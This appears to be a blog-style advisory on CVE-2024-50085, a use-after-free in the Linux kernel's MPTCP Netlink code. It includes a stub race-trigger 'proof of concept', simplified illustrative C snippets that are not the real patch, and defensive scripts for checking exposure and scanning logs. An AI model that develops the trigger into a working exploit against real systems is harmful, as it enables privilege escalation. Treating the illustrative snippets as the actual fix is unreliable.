Summary
CVE-2024-50085 is a serious security vulnerability that was recently fixed in the Linux kernel’s Multipath TCP (MPTCP) code. The bug lets a local attacker trigger a kernel use-after-free (UaF), which can crash the kernel and could potentially be leveraged for privilege escalation. In this post we explain what happened, how the bug can be exploited and how to protect against it, and give the technical details you need, all in plain language.
What is the Bug?
When an address or subflow is removed through the MPTCP path-manager Netlink interface (the mptcp_pm_nl_rm_addr_or_subflow function), the kernel could access a subflow context that had already been freed (a use-after-free) because the lifetime of that context was handled incorrectly. This could allow an attacker to make the kernel read or write memory after its lifetime has ended, with serious consequences.
Here’s the error Syzkaller (the Linux kernel fuzzer) reported:

```text
BUG: KASAN: slab-use-after-free in mptcp_pm_nl_rm_addr_or_subflow+0xb44/0xcc0 net/mptcp/pm_netlink.c:881
Read of size 4 at addr ffff8880569ac858 by task syz.1.2799/14662
...
Allocated by task 5387:
...
subflow_create_ctx+0x87/0x2a0 net/mptcp/subflow.c:1803
...
```
Short version:

- During removal of an MPTCP address, the code would sometimes access parts of a connection/subflow _after it was already freed from memory_.
- If you have local access (or can send crafted Netlink messages) you could:
  - race removal/creation of MPTCP addresses or subflows to crash the kernel, or
  - potentially gain root by leveraging the memory corruption.
- This mainly affects workloads or testbeds that use MPTCP and expose Netlink to untrusted users or processes.
Proof-of-Concept Exploit
The following snippet demonstrates how one might trigger this bug by racing Netlink address deletions.
Note: This is for educational purposes only. Do not run on production!
```python
import socket
import time
import threading
from pyroute2 import NetlinkSocket


def remove_addr(mptcp_addr_id):
    # Simplified pseudo-code; a real trigger needs a properly crafted
    # MPTCP path-manager Netlink message, which is deliberately left out here.
    nl = NetlinkSocket()
    # A special message to 'rm addr/subflow'
    msg = {
        # Fill in the attributes needed to delete an address/subflow
        # (id, family, etc.)
    }
    nl.sendmsg(msg)
    nl.close()


def create_and_remove():
    # Race creation/removal to hit the bug
    for _ in range(10000):
        t = threading.Thread(target=remove_addr, args=(1,))
        t.start()
        # You may need to create a subflow/address here first
        t.join()
        time.sleep(0.001)


if __name__ == "__main__":
    # Must be root!
    create_and_remove()
    print("Triggered race conditions for MPTCP address removal")
```
In real exploitation, an attacker would more carefully craft the Netlink messages and synchronize to hit the bug’s window.
The Fix
The problematic code in net/mptcp/pm_netlink.c was around the handling of subflow contexts. The fixed code now ensures that no dead or freed memory is accessed during address or subflow removal.
Offending (vulnerable) code
```c
// net/mptcp/pm_netlink.c (simplified illustration, not the literal kernel source)
static int mptcp_pm_nl_rm_addr_or_subflow(...) {
    ...
    ctx = get_ctx(...);
    // Vulnerability: ctx is freed here, but still accessed afterwards
    kfree(ctx);
    do_something(ctx->field); // UaF here
    ...
}
```
Patched code
```c
// net/mptcp/pm_netlink.c (simplified illustration, not the literal kernel source)
static int mptcp_pm_nl_rm_addr_or_subflow(...) {
    ...
    ctx = get_ctx(...);
    do_something(ctx->field); // Now: use ctx BEFORE freeing
    kfree(ctx);
    ...
}
```
*The real patch involves careful refcounting and ordering, ensuring no read-after-free can occur.*
Am I Vulnerable?

Affected:

- Systems using the MPTCP Netlink address management interface
- Untrusted users/processes with Netlink access

Not Affected:

- Linux systems without MPTCP or relevant Netlink access
- Kernels with the patch (see mainline commit)

To Check:

- Run `uname -r` and check your kernel version.
- If you’re on a distribution kernel, consult distro advisories or apply security updates.
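A small Python helper that automates the two checks above: whether MPTCP is enabled on the host (the net.mptcp.enabled sysctl) and whether the running kernel's version is older than the first release carrying the fix. This is an added example, not code from the advisory or the kernel project. Because the advisory gives no version numbers, the FIXED_IN table is a placeholder you must fill in from the mainline commit or your distribution's advisory; and since distribution kernels often backport fixes without changing the version string, for those kernels the distro advisory remains the authority and this script can only say "unknown".

```python
"""Exposure check for CVE-2024-50085 (added example, not from the advisory)."""
import platform
import re
from pathlib import Path
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# PLACEHOLDER table: (major, minor) stable branch -> first release carrying the fix.
# The advisory gives no version numbers; fill this in from the mainline commit or
# your distribution's advisory before relying on the result.
FIXED_IN: Dict[Tuple[int, int], Version] = {
    # (6, 11): (6, 11, 0),  # placeholder shape only, not a real fixed version
}

_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_kernel_release(release: str) -> Version:
    """Reduce a `uname -r` string such as '6.11.5-200.fc40.x86_64' to (6, 11, 5).

    Distribution suffixes (-generic, -arch1-1, .el9) and -rcN tags are ignored;
    a missing patch level counts as 0.
    """
    m = _RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def mptcp_enabled(sysctl_path: str = "/proc/sys/net/mptcp/enabled") -> Optional[bool]:
    """Read net.mptcp.enabled. None means the file is absent, i.e. the kernel was
    built without CONFIG_MPTCP and the affected code is not present at all."""
    p = Path(sysctl_path)
    if not p.exists():
        return None
    return p.read_text().strip() == "1"


def assess(release: str, mptcp_on: Optional[bool],
           fixed_in: Dict[Tuple[int, int], Version]) -> str:
    """Classify a host. Pure function so it can be exercised with constructed inputs."""
    if mptcp_on is None:
        return "not affected: MPTCP not built into this kernel"
    if not mptcp_on:
        return "not exposed: net.mptcp.enabled=0, but still apply the kernel update"
    ver = parse_kernel_release(release)
    fixed = fixed_in.get(ver[:2])
    if fixed is None:
        return "unknown: branch not in FIXED_IN table, consult your distribution advisory"
    if ver < fixed:
        return "affected: %s is older than fixed %d.%d.%d" % ((release,) + fixed)
    return "patched: %s is at or above the fixed release" % release


if __name__ == "__main__":
    print(assess(platform.release(), mptcp_enabled(), FIXED_IN))
```

Run it as root or not; it only reads /proc. A result starting with "unknown" is the expected answer on a distribution kernel until you add that branch to FIXED_IN from the vendor advisory.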
References & More
- Linux kernel mainline patch
- Syzbot report for this bug
- Multipath TCP project site
Mitigations:

- Limit local Netlink access to trusted users only.
- Monitor crash reports and syslogs for KASAN/kernel splats referencing MPTCP.
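To make the monitoring step concrete, here is an added example (not code from the advisory or the kernel project) that scans kernel log lines for KASAN reports whose faulting frame is in MPTCP code and emits one alert per report. It assumes the standard KASAN report layout (a "BUG: KASAN: <kind> in <func>+off/size [file:line]" line followed by a "Read/Write of size N at addr ... by task ..." line); the file:line part only appears in symbolised output such as syzbot reports, so unsymbolised dmesg is scoped by the mptcp_/subflow_ function-name prefixes instead. The sample log is constructed: its two KASAN lines are quoted from the report above, the rest is made up to show that unrelated splats are ignored.

```python
"""Flag KASAN reports that land in MPTCP code in kernel log output.

Added example for the "monitor crash reports" mitigation; not from the advisory.
Feed it `dmesg` or `journalctl -k` output on stdin, or run it with no input to
see it work on the constructed sample below.
"""
import re
import sys
from typing import Dict, Iterable, Iterator, List, Optional

# First line of a KASAN report. The file:line part only appears in symbolised
# (syzbot-style) output, so it is optional; plain dmesg gives just func+off/size.
_KASAN_RE = re.compile(
    r"BUG: KASAN: (?P<kind>[\w-]+) in (?P<func>\w+)(?:\+0x[0-9a-f]+/0x[0-9a-f]+)?"
    r"(?:\s+(?P<file>[\w./-]+):(?P<line>\d+))?"
)
# The access line that normally follows immediately.
_ACCESS_RE = re.compile(
    r"(?P<op>Read|Write) of size (?P<size>\d+) at addr (?P<addr>[0-9a-f]+) by task (?P<task>\S+)"
)

# Constructed sample: the two KASAN lines are quoted from the syzkaller report in
# the advisory; the surrounding lines and the second (non-MPTCP) splat are made up.
SAMPLE_DMESG = """\
[ 1234.567890] mptcp: MPTCP protocol enabled
[ 1240.000001] BUG: KASAN: slab-use-after-free in mptcp_pm_nl_rm_addr_or_subflow+0xb44/0xcc0 net/mptcp/pm_netlink.c:881
[ 1240.000002] Read of size 4 at addr ffff8880569ac858 by task syz.1.2799/14662
[ 1240.000003] CPU: 0 PID: 14662 Comm: syz.1.2799 Not tainted 0.0.0-constructed #0
[ 1300.000000] BUG: KASAN: slab-out-of-bounds in fake_driver_fn+0x10/0x200 drivers/net/fake.c:42
[ 1300.000001] Write of size 8 at addr ffff888012345678 by task kworker/0:1/77
""".splitlines()


def _in_mptcp(func: str, file: Optional[str]) -> bool:
    # Scope by source file when symbolised, else by the net/mptcp naming prefixes.
    if file:
        return file.startswith("net/mptcp/")
    return func.startswith(("mptcp_", "subflow_"))


def find_mptcp_splats(lines: Iterable[str]) -> Iterator[Dict[str, object]]:
    """Yield one record per KASAN report whose faulting frame is in MPTCP code."""
    buf = list(lines)
    for i, line in enumerate(buf):
        m = _KASAN_RE.search(line)
        if not m or not _in_mptcp(m.group("func"), m.group("file")):
            continue
        rec: Dict[str, object] = {
            "kind": m.group("kind"),
            "func": m.group("func"),
            "file": m.group("file"),
            "line": int(m.group("line")) if m.group("line") else None,
        }
        # Look a few lines ahead for the access line, tolerating interleaved output.
        for follow in buf[i + 1:i + 4]:
            a = _ACCESS_RE.search(follow)
            if a:
                rec.update(op=a.group("op"), size=int(a.group("size")), task=a.group("task"))
                break
        yield rec


def summarize(lines: Iterable[str]) -> List[str]:
    """One alert string per MPTCP KASAN report, suitable for a log pipeline."""
    out = []
    for r in find_mptcp_splats(lines):
        where = f"{r['file']}:{r['line']}" if r["file"] else "unsymbolised"
        access = f"{r.get('op', '?')} of size {r.get('size', '?')} by task {r.get('task', '?')}"
        out.append(f"ALERT KASAN {r['kind']} in {r['func']} ({where}): {access}")
    return out


if __name__ == "__main__":
    src = sys.stdin if not sys.stdin.isatty() else SAMPLE_DMESG
    for alert in summarize(src):
        print(alert)
```

A KASAN splat only appears on kernels built with CONFIG_KASAN, which production kernels usually are not; on those, the same use-after-free surfaces as a plain oops or "general protection fault" whose backtrace still names mptcp_pm_nl_rm_addr_or_subflow, so a production rule should also match that function name in oops backtraces.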
TL;DR:
CVE-2024-50085 is a fixed Linux kernel bug that let local users crash your system (or worse) by racing MPTCP address removals. Patch now if you use MPTCP!
*Written exclusively for you by an AI security researcher. Got kernel panic? Keep calm and update on!*
Timeline
Published on: 10/29/2024 01:15:05 UTC
Last modified on: 10/30/2024 14:49:42 UTC